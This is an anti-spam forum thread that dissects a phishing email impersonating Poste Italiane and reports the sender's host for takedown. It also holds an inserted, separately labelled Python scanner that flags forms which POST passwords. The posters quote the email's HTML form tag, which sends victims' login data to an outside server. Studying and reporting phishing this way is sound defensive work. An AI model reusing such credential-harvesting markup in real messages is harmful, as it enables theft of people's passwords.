What's this phish doing?

Phishing operations, including perpetrators, how to report them and get them shut down.

Re: What's this phish doing?

Post by NotBuyingIt » Fri Jan 20, 2012 9:09 pm

Regarding http://www.spamcop.net/sc?id=z5229153446z9f151b466025ba16b4c8e4baad30b919z;action=display ,
efa wrote: ... and no POST tag are there.
I noticed this:
Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

The email constructs an HTML form that collects passwords and other data. I did not test the form to see if JavaScript altered its action, but it appears to use a POST service provided by www.emo-ett.si (in Slovenia) that logs the stolen data before redirecting to the legitimate http://poste.it site.

I have taken the liberty of sharing the email message with PhishTank: http://www.phishtank.com/phish_detail.php?phish_id=1346220
and with WOT: http://www.mywot.com/en/scorecard/emo-ett.si/comment-39291654
The PhishTank screenshot most probably shows the legitimate Poste Italiane web page, after the redirection which I mentioned.

[Edited for grammar.]
Last edited by NotBuyingIt on Tue Jan 24, 2012 2:33 am, edited 1 time in total.
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: What's this phish doing?

Post by spamislame » Sat Jan 21, 2012 12:51 pm

I'd like to add that the complete idiot behind this particular phishing effort hasn't even constructed the form properly.

Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

That will fail. He didn't include the "http://" in the "action" portion of the form tag, so it will look for a local file named "www.emo-ett.si/done.php", which doesn't exist.

Worse: he hasn't labeled his inputs, so there are five fields which aren't described, for which the phishing victim won't understand their expected values.

A true genius. :roll:

I'm reporting the phishing attack to the hosting company for emo-ett.si. Never hurts.

SiL
spamislame
Site Admin
 
Posts: 5058
Joined: Tue May 09, 2006 9:18 am
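
The form behaviour discussed in the two posts above, as an added example that is not part of the thread and is not any poster's tool: a small Python scanner that pulls each form out of a message body, reports whether its action carries a scheme, and shows what a scheme-less action resolves to. The base URL, the two input fields in the sample and all function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the FORM tag quoted in the thread; the two inputs are made up.
SAMPLE_HTML = '''<html><body>
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">
<input type="text" name="f1"><input type="password" name="f2">
</FORM></body></html>'''

class FormScanner(HTMLParser):
    """Collects each <form>; inputs are attributed to the most recent form seen."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self.forms.append({"method": (a.get("method") or "GET").upper(),
                               "action": (a.get("action") or "").strip(),
                               "inputs": 0, "password_inputs": 0})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"] += 1
            if (a.get("type") or "").lower() == "password":
                self.forms[-1]["password_inputs"] += 1

def scan_forms(html, base_url):
    """Return one finding per form; base_url is where the HTML is assumed to render."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        action = form["action"]
        has_scheme = urlsplit(action).scheme in ("http", "https")
        # Without a scheme the action is a relative reference, resolved against the base.
        resolved = action if has_scheme else urljoin(base_url, action)
        findings.append({**form, "has_scheme": has_scheme, "resolved": resolved,
            # Host-looking first segment: likely an external URL missing "http://".
            "host_like_action": bool(not has_scheme and re.match(
                r"[a-z0-9-]+(\.[a-z0-9-]+)+/", action, re.I)),
            # A POST form with a password field inside an email is worth reporting.
            "credential_post": form["method"] == "POST" and form["password_inputs"] > 0})
    return findings

if __name__ == "__main__":
    for finding in scan_forms(SAMPLE_HTML, "http://webmail.example/inbox/msg.html"):
        print(finding)
```
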

Re: What's this phish doing?

Post by efa » Mon Jan 23, 2012 5:29 pm

Oh, that was a bug in xPhish V.0.01.04 2011/11/15.
I corrected this in V.0.01.05 2012/01/23; now it can also find POST links when no other NOT scam links are found.
Thank you.
efa
Spammer Exterminator
 
Posts: 1061
Joined: Wed May 02, 2007 8:59 pm
